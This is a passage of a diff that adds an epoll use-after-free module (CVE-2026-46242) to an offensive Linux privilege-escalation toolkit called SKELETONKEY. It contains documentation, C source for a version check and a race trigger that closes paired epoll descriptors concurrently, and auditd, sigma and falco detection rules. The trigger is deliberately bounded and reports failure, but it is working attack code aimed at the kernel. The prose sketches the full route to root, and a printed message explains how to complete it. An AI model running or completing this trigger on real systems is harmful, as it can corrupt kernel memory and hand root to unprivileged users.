below 6.4 or on a patched kernel, and `VULNERABLE` in range. There is **no
|
||||
`PRECOND_FAIL` userns path** the way `nft_catchall` has — epoll needs no
|
||||
namespace, so there is no unprivileged-userns stopgap to report or to
|
||||
harden with.
|
||||
|
||||
`exploit()` forks a CPU-pinned child that builds the epoll race pair (a
|
||||
waiter eventpoll watching a target eventpoll) and exercises the
|
||||
`ep_remove`-vs-`__fput` concurrent-close window a **hard-bounded** number
|
||||
of times (48 attempts / 2 s), widening it with `close(dup())`
|
||||
false-sharing storms, snapshots the `eventpoll`/`kmalloc-192` slab, and
|
||||
returns `EXPLOIT_FAIL`.
|
||||
|
||||
It is **deliberately under-driven**. A *won* race frees a live
|
||||
`struct eventpoll` — genuine kernel memory corruption that rarely trips
|
||||
KASAN, so on a vulnerable production host a completed race can silently
|
||||
destabilise the box rather than cleanly oops. This module therefore does
|
||||
**not** grind the race to a win, does **not** perform the cross-cache
|
||||
reclaim, and does **not** bundle the per-kernel `fdinfo` arbitrary-read +
|
||||
ROP that lands root (per-build offsets refused). The trigger is
|
||||
**reconstructed from the public kernelCTF PoC and is not VM-verified**. It
|
||||
never claims root it did not get.
|
||||
|
||||
Because a kernel race is the least predictable class in the corpus — and
|
||||
this one can corrupt memory invisibly — `bad_epoll` carries the **lowest
|
||||
`--auto` safety rank** (see `module_safety_rank()` in `skeletonkey.c`), so
|
||||
`--auto` only ever reaches for it after every safer vulnerable module.
|
||||
|
||||
## Detection is hard — read this before shipping the rules
|
||||
|
||||
Unlike most modules, `bad_epoll` has **no high-fidelity signature**.
|
||||
`epoll_create1` / `epoll_ctl` / `close` is the steady-state behaviour of
|
||||
nginx, systemd, and every language runtime's event loop; the exploit
|
||||
looks identical and rarely trips KASAN. The shipped auditd/sigma/falco
|
||||
rules therefore key on the **post-exploitation** tell — an unprivileged
|
||||
process transitioning to euid 0 without a setuid `execve` — plus a
|
||||
recommendation to monitor kernel logs for oops/BUG lines. Expect false
|
||||
positives from legitimate privilege-management daemons and tune per
|
||||
environment. There is no yara rule (no file artifact). Treat this module
|
||||
as much as a *blue-team teaching case* — "here is a root LPE your existing
|
||||
stack is nearly blind to" — as an offensive one.
|
||||
|
||||
## Fix / mitigation
|
||||
|
||||
Upgrade the kernel (>= 7.0.13, or 7.1+). There is **no partial
|
||||
mitigation**: epoll cannot be disabled in practice, and no
|
||||
`unprivileged_userns_clone` / sysctl toggle closes this path the way it
|
||||
does for the netfilter bugs. `mitigate()` is `NULL` for that reason.
|
||||
|
||||
## Credit
|
||||
|
||||
Discovery, exploitation, and the public kernelCTF PoC:
|
||||
**Jaeyoung Chung** (`J-jaeyoung`). Upstream fix `a6dc643c6931`. See
|
||||
`NOTICE.md`.
|
||||
@@ -0,0 +1,70 @@
|
||||
# NOTICE — bad_epoll (CVE-2026-46242)
|
||||
|
||||
## Vulnerability
|
||||
|
||||
**CVE-2026-46242** — "Bad Epoll", a **race-condition use-after-free** in
|
||||
the Linux kernel epoll subsystem (`fs/eventpoll.c`). On the file-teardown
|
||||
path, `ep_remove()` clears `file->f_ep` under `file->f_lock` but continues
|
||||
to use the file inside the critical section (`hlist_del_rcu()` over the
|
||||
eventpoll `refs` list + `spin_unlock()`). A concurrent `__fput()` of a
|
||||
linked epoll file observes the transient `NULL` `f_ep`, skips
|
||||
`eventpoll_release_file()`, and proceeds to `f_op->release`, freeing a
|
||||
`struct eventpoll` still in use → UAF.
|
||||
|
||||
The bug is reachable by **any unprivileged local user** — `epoll_create1`,
|
||||
`epoll_ctl`, and `close` require no capability, no user namespace, and no
|
||||
special kernel config. Exploitation converts the 8-byte UAF write into
|
||||
control of a `struct file` via a cross-cache attack, gains arbitrary
|
||||
kernel read through `/proc/self/fdinfo`, and ROPs to a root shell —
|
||||
roughly 99% reliable despite a ~6-instruction race window. It also affects
|
||||
Android. NVD class: **CWE-416** (Use After Free), with a **CWE-362** race
|
||||
root cause. **Not** in CISA KEV (brand new).
|
||||
|
||||
## Research credit
|
||||
|
||||
- **Discovery, exploitation, and public PoC** by **Jaeyoung Chung**
|
||||
(GitHub `J-jaeyoung`), submitted as a zero-day to **Google's kernelCTF**
|
||||
program. Repository: <https://github.com/J-jaeyoung/bad-epoll> and the
|
||||
kernelCTF submission under
|
||||
`J-jaeyoung/security-research` (`CVE-2026-46242_lts_cos`, target
|
||||
`lts-6.12.67`). SKELETONKEY's trigger reconstruction is informed by that
|
||||
public PoC (the epoll object graph and the `ep_remove`-vs-`__fput`
|
||||
close-race shape only — no offsets or ROP are reused).
|
||||
- **Introduced** by commit `58c9b016e128` (Linux 6.4, 2023-04-08).
|
||||
- **Fixed upstream** by commit
|
||||
`a6dc643c69311677c574a0f17a3f4d66a5f3744b`, merged for **7.1-rc1**
|
||||
(2026-04-24); stable backport **7.0.13**.
|
||||
- Debian security tracker (authoritative backport versions):
|
||||
<https://security-tracker.debian.org/tracker/CVE-2026-46242> — forky
|
||||
`7.0.13-1` / sid `7.0.14-1` fixed; trixie 6.12.x still vulnerable at time
|
||||
of writing; bookworm 6.1 and bullseye 5.10 "not affected — vulnerable
|
||||
code not present".
|
||||
|
||||
All credit for finding, analysing, and exploiting this bug belongs to
|
||||
Jaeyoung Chung and to the upstream maintainers who fixed it. SKELETONKEY
|
||||
is the bundling and bookkeeping layer only.
|
||||
|
||||
## SKELETONKEY role
|
||||
|
||||
🟡 **Trigger (reconstructed) — primitive-only, not VM-verified.** This is
|
||||
the corpus's first epoll / VFS-file-teardown module and its cleanest
|
||||
example of an SMP kernel race, shipped on the same "fire the bug class and
|
||||
stop" contract as `stackrot` (CVE-2023-3269) and `nft_catchall`
|
||||
(CVE-2026-23111).
|
||||
|
||||
`detect()` is a pure kernel-version gate (vulnerable iff `>= 6.4` and below
|
||||
the fix on-branch; stable backport 7.0.13, 7.1+ inherits; 6.1/5.10 not
|
||||
affected) — no userns or CONFIG precondition, because none is required.
|
||||
`exploit()` forks a CPU-pinned child that builds the epoll race pair and
|
||||
exercises the `ep_remove`-vs-`__fput` concurrent-close window a
|
||||
hard-bounded number of times (48 attempts / 2 s), widening it with
|
||||
`close(dup())` false-sharing storms, snapshots the eventpoll slab, and
|
||||
returns `EXPLOIT_FAIL`.
|
||||
|
||||
It is **deliberately under-driven**: a won race frees a live
|
||||
`struct eventpoll` (real corruption that rarely trips KASAN), so the module
|
||||
does not grind the race to a win, does not perform the cross-cache reclaim,
|
||||
and does not bundle the `/proc/self/fdinfo` arbitrary-read + ROP root-pop
|
||||
(per-build offsets refused). The trigger is reconstructed from the public
|
||||
kernelCTF PoC, not VM-verified — it never claims root it did not get. It
|
||||
carries the lowest `--auto` safety rank in the corpus.
|
||||
@@ -0,0 +1,434 @@
|
||||
/*
|
||||
* bad_epoll_cve_2026_46242 — SKELETONKEY module
|
||||
*
|
||||
* CVE-2026-46242 — "Bad Epoll", a race-condition use-after-free in the
|
||||
* Linux kernel epoll subsystem (fs/eventpoll.c). On the file-teardown
|
||||
* path, ep_remove() clears file->f_ep under file->f_lock but keeps
|
||||
* *using* the file inside the critical section (the hlist_del_rcu() over
|
||||
* the eventpoll's refs list + spin_unlock). A concurrent __fput() of a
|
||||
* linked epoll file can observe the transient NULL f_ep, skip
|
||||
* eventpoll_release_file(), and go straight to f_op->release — freeing a
|
||||
* struct eventpoll that the first path is still walking. The result is a
|
||||
* UAF on a live kernel object reachable by ANY unprivileged local user:
|
||||
* epoll_create1(2) / epoll_ctl(2) / close(2) need no capability, no user
|
||||
* namespace, and no special CONFIG (epoll is always built in). That is
|
||||
* what makes it nasty — there is no unprivileged-userns stopgap to close
|
||||
* the way there is for the netfilter bugs; the only fix is to patch.
|
||||
*
|
||||
* Public exploit (Jaeyoung Chung / J-jaeyoung, "bad-epoll"), submitted
|
||||
* to Google's kernelCTF: four epoll objects in two pairs — one pair
|
||||
* drives the race, the other is the victim — turn the 8-byte UAF write
|
||||
* into control of a struct file via a cross-cache attack, then arbitrary
|
||||
* kernel read via /proc/self/fdinfo and a ROP chain to a root shell.
|
||||
* ~99% reliable despite a race window only ~6 instructions wide; it
|
||||
* rarely trips KASAN, which is precisely why the bug hid for three
|
||||
* years.
|
||||
*
|
||||
* CWE-416 (Use After Free) via CWE-362 (race). Introduced by commit
|
||||
* 58c9b016e128 (Linux 6.4, 2023-04-08); fixed by commit
|
||||
* a6dc643c69311677c574a0f17a3f4d66a5f3744b (merged for 7.1-rc1,
|
||||
* 2026-04-24), stable backport 7.0.13. NOT in CISA KEV (brand new).
|
||||
*
|
||||
* STATUS: 🟡 TRIGGER (reconstructed) — primitive-only, NOT VM-verified.
|
||||
* This is a genuine SMP kernel race that, if *won*, frees a live
|
||||
* struct eventpoll — real memory corruption that (per the public
|
||||
* analysis) rarely trips KASAN, so a won-but-not-completed race can
|
||||
* silently destabilise a vulnerable host rather than cleanly oops.
|
||||
* For that reason this module is deliberately UNDER-DRIVEN: exploit()
|
||||
* builds the epoll object graph and exercises the concurrent-close
|
||||
* window (ep_remove vs __fput) a small, bounded number of times inside
|
||||
* a fork-isolated child, snapshots the eventpoll slab, and STOPS. It
|
||||
* does NOT grind the race to a win, does NOT perform the cross-cache
|
||||
* reclaim, and does NOT bundle the per-kernel fdinfo arbitrary-read +
|
||||
* ROP that lands root (per-build offsets refused). It returns
|
||||
* EXPLOIT_FAIL and never claims root it did not get. The trigger is
|
||||
* reconstructed from the public kernelCTF PoC, not VM-verified. This
|
||||
* is why it carries the lowest safety rank in --auto (a kernel race is
|
||||
* the least predictable class; see skeletonkey.c module_safety_rank).
|
||||
*
|
||||
* detect() is a pure version gate: vulnerable iff the running kernel is
|
||||
* >= 6.4 (the commit that introduced the bug) AND below the fix on its
|
||||
* branch (Debian: bookworm/6.1 and bullseye/5.10 are "not affected —
|
||||
* vulnerable code not present"; trixie/6.12 still vulnerable at time of
|
||||
* writing; forky/sid fixed at 7.0.13/7.0.14). No userns / CONFIG
|
||||
* precondition — any unprivileged user can reach it.
|
||||
*
|
||||
* Affected range (Debian security tracker, source of record):
|
||||
* introduced 6.4 (58c9b016e128); mainline fix in 7.1-rc1
|
||||
* (a6dc643c6931); stable backport 7.0.13. 6.6/6.12 LTS backports had
|
||||
* not landed at time of writing → version-only VULNERABLE there
|
||||
* (tools/refresh-kernel-ranges.py will extend the table as distros
|
||||
* publish). 6.1 and older predate the bug.
|
||||
*
|
||||
* arch_support: x86_64 (the cross-cache groom + any future finisher are
|
||||
* x86_64-tuned; detect() and the reachability trigger are arch-neutral
|
||||
* but we only claim x86_64 for exploit()).
|
||||
*/
|
||||
|
||||
#include "skeletonkey_modules.h"
|
||||
#include "../../core/registry.h"
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <stdbool.h>
|
||||
#include <unistd.h>
|
||||
|
||||
#ifdef __linux__
|
||||
|
||||
#include "../../core/kernel_range.h"
|
||||
#include "../../core/host.h"
|
||||
|
||||
#include <stdint.h>
|
||||
#include <stdatomic.h>
|
||||
#include <fcntl.h>
|
||||
#include <errno.h>
|
||||
#include <time.h>
|
||||
#include <sched.h>
|
||||
#include <pthread.h>
|
||||
#include <signal.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/epoll.h>
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* Kernel-range table. The fix landed mainline in 7.1-rc1
|
||||
* (a6dc643c6931); the only stable backport that had shipped at time of
|
||||
* writing is 7.0.13 (Debian forky 7.0.13-1 / sid 7.0.14-1). A single
|
||||
* {7,0,13} entry plus the ">= 6.4 introduced" gate below is sufficient:
|
||||
* kernel_range_is_patched() treats any branch strictly newer than every
|
||||
* entry (i.e. 7.1+) as patched-via-mainline, and every branch at or
|
||||
* below 7.0 with no exact entry (6.4..6.12, 7.0.<13) as still
|
||||
* vulnerable — which is exactly the Debian tracker's verdict. Add
|
||||
* 6.6.x / 6.12.x entries here when those LTS backports land (the drift
|
||||
* checker flags them). security-tracker.debian.org is the source.
|
||||
* ------------------------------------------------------------------ */
|
||||
static const struct kernel_patched_from bad_epoll_patched_branches[] = {
|
||||
{7, 0, 13}, /* 7.0.x (Debian forky 7.0.13-1 / sid 7.0.14-1); 7.1+ inherits */
|
||||
};
|
||||
|
||||
static const struct kernel_range bad_epoll_range = {
|
||||
.patched_from = bad_epoll_patched_branches,
|
||||
.n_patched_from = sizeof(bad_epoll_patched_branches) /
|
||||
sizeof(bad_epoll_patched_branches[0]),
|
||||
};
|
||||
|
||||
static skeletonkey_result_t bad_epoll_detect(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
|
||||
if (!v || v->major == 0) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[!] bad_epoll: host fingerprint missing kernel "
|
||||
"version — bailing\n");
|
||||
return SKELETONKEY_TEST_ERROR;
|
||||
}
|
||||
|
||||
/* The vulnerable ep_remove()/__fput() interleaving was introduced by
|
||||
* commit 58c9b016e128 in 6.4. Below that the code pattern is absent
|
||||
* (Debian marks bookworm/6.1 and bullseye/5.10 "not affected —
|
||||
* vulnerable code not present"). */
|
||||
if (!skeletonkey_host_kernel_at_least(ctx->host, 6, 4, 0)) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[i] bad_epoll: kernel %s predates the vulnerable "
|
||||
"epoll teardown path (introduced 6.4) — not affected\n",
|
||||
v->release);
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
if (kernel_range_is_patched(&bad_epoll_range, v)) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[+] bad_epoll: kernel %s is patched (>= 7.0.13 / "
|
||||
"7.1+ inherits the mainline fix)\n", v->release);
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[!] bad_epoll: VULNERABLE — kernel %s in range "
|
||||
"[6.4, fix); epoll teardown race reachable by any "
|
||||
"unprivileged user (no userns / CONFIG gate)\n",
|
||||
v->release);
|
||||
fprintf(stderr, "[i] bad_epoll: no unprivileged-userns stopgap applies "
|
||||
"here — the only fix is to patch the kernel\n");
|
||||
}
|
||||
return SKELETONKEY_VULNERABLE;
|
||||
}
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* Reconstructed reachability trigger (deliberately under-driven).
|
||||
*
|
||||
* Faithful minimal shape of the public PoC's race pair: a "waiter"
|
||||
* epoll watches a "target" epoll; the two are then closed concurrently
|
||||
* from CPU-pinned contexts so ep_remove() (driven by fput of the
|
||||
* watched target) races __fput() of the waiter eventpoll. The PoC
|
||||
* widens the ~6-instruction window with close(dup(target)) storms that
|
||||
* induce false-sharing on the file's f_count cache line and stall the
|
||||
* racer's read of f_op.
|
||||
*
|
||||
* We reproduce the OBJECT GRAPH and the CONCURRENT-CLOSE WINDOW with a
|
||||
* small iteration + wall-clock budget, then stop. We do NOT reclaim the
|
||||
* freed slab, do NOT run the depth-3 nesting oracle that only fires
|
||||
* after a real UAF write, and do NOT weaponise. The honest witness is
|
||||
* therefore coarse: a signal in the isolated child (a KASAN oops or
|
||||
* corruption fault, if the race happened to fire) and an eventpoll-slab
|
||||
* delta. Absence of a witness does NOT prove the host is safe.
|
||||
* ------------------------------------------------------------------ */
|
||||
#define BEP_RACE_ITERS 48 /* bounded — reachability probe, not a winner */
|
||||
#define BEP_DUP_CLOSE_ITERS 32 /* window-widening false-sharing storm */
|
||||
#define BEP_RACE_BUDGET_SECS 2 /* honest short cap (public PoC uses 5 min) */
|
||||
|
||||
static void bep_pin_cpu(int cpu)
|
||||
{
|
||||
cpu_set_t set;
|
||||
CPU_ZERO(&set);
|
||||
CPU_SET(cpu, &set);
|
||||
(void)sched_setaffinity(0, sizeof set, &set); /* best-effort */
|
||||
}
|
||||
|
||||
struct bep_racer {
|
||||
int waiter_fd; /* fd the racer closes */
|
||||
atomic_int *go; /* fire signal from main */
|
||||
atomic_int *closed; /* set once the racer has closed */
|
||||
};
|
||||
|
||||
static void *bep_racer_fn(void *arg)
|
||||
{
|
||||
struct bep_racer *r = (struct bep_racer *)arg;
|
||||
bep_pin_cpu(0);
|
||||
/* Spin until main is at the close point, then race. */
|
||||
while (atomic_load_explicit(r->go, memory_order_acquire) == 0)
|
||||
;
|
||||
close(r->waiter_fd);
|
||||
atomic_store_explicit(r->closed, 1, memory_order_release);
|
||||
return NULL;
|
||||
}
|
||||
|
||||
static long bep_slabinfo_active(const char *slab)
|
||||
{
|
||||
FILE *f = fopen("/proc/slabinfo", "r");
|
||||
if (!f) return -1;
|
||||
char line[512];
|
||||
long active = -1;
|
||||
size_t n = strlen(slab);
|
||||
while (fgets(line, sizeof line, f)) {
|
||||
if (strncmp(line, slab, n) == 0 && line[n] == ' ') {
|
||||
long a;
|
||||
if (sscanf(line + n, " %ld", &a) == 1) active = a;
|
||||
break;
|
||||
}
|
||||
}
|
||||
fclose(f);
|
||||
return active;
|
||||
}
|
||||
|
||||
/* One race attempt: build (target, waiter) with waiter watching target,
|
||||
* then close both concurrently. Returns 0 normally; the interesting
|
||||
* outcome (a won race) manifests as a signal that the parent observes,
|
||||
* not a return value. */
|
||||
static void bep_one_attempt(void)
|
||||
{
|
||||
int target = epoll_create1(EPOLL_CLOEXEC);
|
||||
if (target < 0) return;
|
||||
int waiter = epoll_create1(EPOLL_CLOEXEC);
|
||||
if (waiter < 0) { close(target); return; }
|
||||
|
||||
/* waiter watches target — this is the link that makes closing target
|
||||
* drive eventpoll_release_file()/ep_remove() over waiter's eventpoll. */
|
||||
struct epoll_event ev = { .events = EPOLLIN };
|
||||
ev.data.fd = target;
|
||||
if (epoll_ctl(waiter, EPOLL_CTL_ADD, target, &ev) < 0) {
|
||||
close(waiter); close(target); return;
|
||||
}
|
||||
|
||||
atomic_int go = 0, closed = 0;
|
||||
struct bep_racer ra = { .waiter_fd = waiter, .go = &go, .closed = &closed };
|
||||
pthread_t th;
|
||||
if (pthread_create(&th, NULL, bep_racer_fn, &ra) != 0) {
|
||||
close(waiter); close(target); return;
|
||||
}
|
||||
|
||||
/* Widen the window: false-sharing storm on target's f_count line,
|
||||
* then release the racer and close target ourselves so ep_remove
|
||||
* (our fput of the watched file) overlaps __fput of the waiter. */
|
||||
for (int i = 0; i < BEP_DUP_CLOSE_ITERS; i++) {
|
||||
int d = dup(target);
|
||||
if (d >= 0) close(d);
|
||||
}
|
||||
atomic_store_explicit(&go, 1, memory_order_release);
|
||||
close(target);
|
||||
|
||||
pthread_join(th, NULL);
|
||||
}
|
||||
|
||||
static skeletonkey_result_t bad_epoll_exploit(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
skeletonkey_result_t pre = bad_epoll_detect(ctx);
|
||||
if (pre != SKELETONKEY_VULNERABLE) {
|
||||
fprintf(stderr, "[-] bad_epoll: detect() says not vulnerable; refusing\n");
|
||||
return pre;
|
||||
}
|
||||
bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
|
||||
if (is_root) {
|
||||
fprintf(stderr, "[i] bad_epoll: already running as root\n");
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[*] bad_epoll: reconstructed reachability probe — builds "
|
||||
"the epoll race pair and exercises the ep_remove vs __fput "
|
||||
"close window (%d bounded attempts, %ds cap), then stops. "
|
||||
"The cross-cache → struct file control → fdinfo arb-read → "
|
||||
"ROP root-pop is NOT bundled.\n",
|
||||
BEP_RACE_ITERS, BEP_RACE_BUDGET_SECS);
|
||||
|
||||
/* Fork-isolated: a won race frees a live struct eventpoll. On a
|
||||
* KASAN kernel that oopses (contained to the child); on a plain
|
||||
* vulnerable kernel it may corrupt — which is exactly why we bound
|
||||
* the attempt count hard and never reclaim. */
|
||||
pid_t child = fork();
|
||||
if (child < 0) { perror("[-] fork"); return SKELETONKEY_TEST_ERROR; }
|
||||
|
||||
if (child == 0) {
|
||||
bep_pin_cpu(1);
|
||||
long before = bep_slabinfo_active("eventpoll");
|
||||
if (before < 0) before = bep_slabinfo_active("kmalloc-192");
|
||||
|
||||
time_t deadline = time(NULL) + BEP_RACE_BUDGET_SECS;
|
||||
int done = 0;
|
||||
for (int i = 0; i < BEP_RACE_ITERS && time(NULL) < deadline; i++) {
|
||||
bep_one_attempt();
|
||||
done = i + 1;
|
||||
}
|
||||
|
||||
long after = bep_slabinfo_active("eventpoll");
|
||||
if (after < 0) after = bep_slabinfo_active("kmalloc-192");
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[i] bad_epoll: %d close-race attempts fired; "
|
||||
"eventpoll/kmalloc-192 active: %ld → %ld\n",
|
||||
done, before, after);
|
||||
_exit(100); /* honest: window exercised, race not driven to a win */
|
||||
}
|
||||
|
||||
int status;
|
||||
waitpid(child, &status, 0);
|
||||
if (WIFSIGNALED(status)) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[!] bad_epoll: child died by signal %d — the epoll "
|
||||
"teardown race may have fired (KASAN oops / corruption "
|
||||
"fault). This is the bug, but no root was obtained.\n",
|
||||
WTERMSIG(status));
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
if (WIFEXITED(status) && WEXITSTATUS(status) == 100) {
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[!] bad_epoll: race window exercised (reconstructed "
|
||||
"primitive). Full chain is NOT bundled and the trigger "
|
||||
"is not VM-verified — honest EXPLOIT_FAIL.\n");
|
||||
fprintf(stderr, "[i] bad_epoll: to complete: port the public kernelCTF "
|
||||
"cross-cache reclaim (eventpoll slab → pipe buffers) + "
|
||||
"/proc/self/fdinfo arbitrary read + ROP for "
|
||||
"CVE-2026-46242.\n");
|
||||
}
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[-] bad_epoll: probe setup failed (child rc=%d)\n",
|
||||
WIFEXITED(status) ? WEXITSTATUS(status) : -1);
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
#else /* !__linux__ */
|
||||
|
||||
static skeletonkey_result_t bad_epoll_detect(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[i] bad_epoll: Linux-only module (epoll teardown race "
|
||||
"UAF) — not applicable here\n");
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
static skeletonkey_result_t bad_epoll_exploit(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
(void)ctx;
|
||||
fprintf(stderr, "[-] bad_epoll: Linux-only module — cannot run here\n");
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
|
||||
#endif /* __linux__ */
|
||||
|
||||
/* ----- Embedded detection rules -----
|
||||
*
|
||||
* Honesty note (see MODULE.md): epoll is one of the most heavily used
|
||||
* kernel interfaces on Earth. epoll_create1 / epoll_ctl / close from an
|
||||
* unprivileged process is the steady-state behaviour of nginx, systemd,
|
||||
* every language runtime's event loop, etc. There is NO clean behavioural
|
||||
* signature for this exploit, and it rarely trips KASAN. These rules are
|
||||
* therefore intentionally weak/structural — the reliable signal is the
|
||||
* post-exploitation privilege transition, not the epoll traffic. Tune
|
||||
* hard or you will drown in false positives.
|
||||
*/
|
||||
static const char bad_epoll_auditd[] =
|
||||
"# Bad Epoll — epoll teardown race UAF (CVE-2026-46242) — auditd rules\n"
|
||||
"# There is no high-fidelity syscall signature: epoll_create1/epoll_ctl\n"
|
||||
"# are ubiquitous and benign. The only reliable smoking gun is an\n"
|
||||
"# unprivileged process transitioning to euid 0 without going through a\n"
|
||||
"# setuid binary. Pair with kernel-log monitoring for KASAN/oops lines.\n"
|
||||
"-a always,exit -F arch=b64 -S setresuid -F a0=0 -F a1=0 -F a2=0 -F auid>=1000 -F auid!=4294967295 -k skeletonkey-bad-epoll-priv\n"
|
||||
"-a always,exit -F arch=b64 -S setuid -F a0=0 -F auid>=1000 -F auid!=4294967295 -k skeletonkey-bad-epoll-priv\n";
|
||||
|
||||
static const char bad_epoll_sigma[] =
|
||||
"title: Possible CVE-2026-46242 Bad Epoll teardown race UAF\n"
|
||||
"id: 7c1e9d2a-skeletonkey-bad-epoll\n"
|
||||
"status: experimental\n"
|
||||
"description: |\n"
|
||||
" Bad Epoll (CVE-2026-46242) is a race UAF in fs/eventpoll.c reachable\n"
|
||||
" by any unprivileged user via epoll_create1/epoll_ctl/close. There is\n"
|
||||
" no reliable syscall-level signature — epoll traffic is ubiquitous and\n"
|
||||
" the exploit rarely trips KASAN. This rule keys on the POST-exploitation\n"
|
||||
" tell: a previously-unprivileged process gaining euid 0 with no setuid\n"
|
||||
" execve in its ancestry. Expect false positives from legitimate\n"
|
||||
" privilege-management daemons; correlate with kernel oops/BUG lines.\n"
|
||||
"logsource: {product: linux, service: auditd}\n"
|
||||
"detection:\n"
|
||||
" uid0: {type: 'SYSCALL', syscall: 'setresuid', a0: 0, a1: 0, a2: 0}\n"
|
||||
" unpriv: {auid|expression: '>= 1000'}\n"
|
||||
" condition: uid0 and unpriv\n"
|
||||
"level: medium\n"
|
||||
"tags: [attack.privilege_escalation, attack.t1068, cve.2026.46242]\n";
|
||||
|
||||
static const char bad_epoll_falco[] =
|
||||
"- rule: Unprivileged process gained root, no setuid exec (possible CVE-2026-46242)\n"
|
||||
" desc: |\n"
|
||||
" Bad Epoll (CVE-2026-46242) epoll teardown race UAF has no clean\n"
|
||||
" behavioural signature — epoll syscalls are ubiquitous. This rule\n"
|
||||
" fires on the post-exploitation effect: a non-root process becoming\n"
|
||||
" root outside a setuid binary. False positives: privilege-management\n"
|
||||
" daemons, su/sudo flows (filter those). Correlate with kernel oops.\n"
|
||||
" condition: >\n"
|
||||
" evt.type in (setuid, setresuid) and evt.arg.uid = 0 and\n"
|
||||
" not proc.is_setuid = true and user.uid != 0\n"
|
||||
" output: >\n"
|
||||
" Non-setuid unprivileged->root transition (possible CVE-2026-46242 Bad Epoll)\n"
|
||||
" (user=%user.name proc=%proc.name pid=%proc.pid ppid=%proc.ppid)\n"
|
||||
" priority: WARNING\n"
|
||||
" tags: [process, mitre_privilege_escalation, T1068, cve.2026.46242]\n";
|
||||
|
||||
const struct skeletonkey_module bad_epoll_module = {
|
||||
.name = "bad_epoll",
|
||||
.cve = "CVE-2026-46242",
|
||||
.summary = "epoll ep_remove-vs-__fput teardown race UAF (\"Bad Epoll\") — frees a live struct eventpoll; unprivileged, no userns needed",
|
||||
.family = "eventpoll",
|
||||
.kernel_range = "6.4 <= K < fix (introduced 58c9b016e128 / 6.4); fixed a6dc643c6931 (7.1-rc1), stable backport 7.0.13; 6.6/6.12 LTS backports pending; 6.1 and older not affected",
|
||||
.detect = bad_epoll_detect,
|
||||
.exploit = bad_epoll_exploit,
|
||||
.mitigate = NULL, /* mitigation: upgrade kernel — no unprivileged-userns/CONFIG stopgap applies (epoll needs none) */
|
||||
.cleanup = NULL, /* trigger creates only throwaway epoll fds in a fork-isolated child; no host artifacts */
|
||||
.detect_auditd = bad_epoll_auditd,
|
||||
.detect_sigma = bad_epoll_sigma,
|
||||
.detect_yara = NULL, /* pure in-kernel race — no file artifact to match */
|
||||
.detect_falco = bad_epoll_falco,
|
||||
.opsec_notes = "detect() is a pure kernel-version gate (vulnerable iff >= 6.4 introduced AND below the fix on-branch; stable backport 7.0.13, 7.1+ inherits; 6.1/5.10 not affected) — no userns or CONFIG probe, because epoll is reachable by every unprivileged user. exploit() forks a CPU-pinned child that builds the epoll race pair (a waiter eventpoll watching a target eventpoll) and exercises the ep_remove-vs-__fput concurrent-close window a hard-bounded number of times (48 attempts / 2s), widening it with close(dup()) false-sharing storms, snapshots the eventpoll/kmalloc-192 slab, and returns EXPLOIT_FAIL. It is deliberately UNDER-DRIVEN: it does not grind the race to a win, does not perform the cross-cache reclaim, and does not bundle the /proc/self/fdinfo arbitrary-read + ROP root-pop (per-kernel offsets refused); the trigger is reconstructed from the public kernelCTF PoC, not VM-verified. Telemetry footprint is nearly invisible: a burst of epoll_create1/epoll_ctl/dup/close from one process (indistinguishable from any event-loop program) and, only if the race actually fires on a vulnerable host, a possible KASAN oops or silent corruption (the bug rarely trips KASAN). No persistent files. The reliable detection signal is the post-exploitation euid-0 transition, not the epoll activity — see the shipped rules. Lowest --auto safety rank in the corpus: a kernel race that frees a live struct file is the least predictable thing here.",
|
||||
.arch_support = "x86_64",
|
||||
};
|
||||
|
||||
void skeletonkey_register_bad_epoll(void)
|
||||
{
|
||||
skeletonkey_register(&bad_epoll_module);
|
||||
}
|
||||
@@ -0,0 +1,12 @@
|
||||
/*
|
||||
* bad_epoll_cve_2026_46242 — SKELETONKEY module registry hook
|
||||
*/
|
||||
|
||||
#ifndef BAD_EPOLL_SKELETONKEY_MODULES_H
|
||||
#define BAD_EPOLL_SKELETONKEY_MODULES_H
|
||||
|
||||
#include "../../core/module.h"
|
||||
|
||||
extern const struct skeletonkey_module bad_epoll_module;
|
||||
|
||||
#endif
|
||||
@@ -57,6 +57,12 @@
|
||||
#include <sys/stat.h>
|
||||
#include <sys/wait.h>
|
||||
|
||||
/* CLONE_NEWCGROUP is not always in the toolchain's <sched.h>. */
|
||||
#ifndef CLONE_NEWCGROUP
|
||||
#define CLONE_NEWCGROUP 0x02000000
|
||||
#endif
|
||||
#define CGRA_CLONE_NEWCGROUP CLONE_NEWCGROUP
|
||||
|
||||
/* Stable-branch backport thresholds for the fix. */
|
||||
static const struct kernel_patched_from cgroup_ra_patched_branches[] = {
|
||||
{4, 9, 301},
|
||||
@@ -178,10 +184,24 @@ static skeletonkey_result_t cgroup_ra_exploit(const struct skeletonkey_ctx *ctx)
|
||||
pid_t child = fork();
|
||||
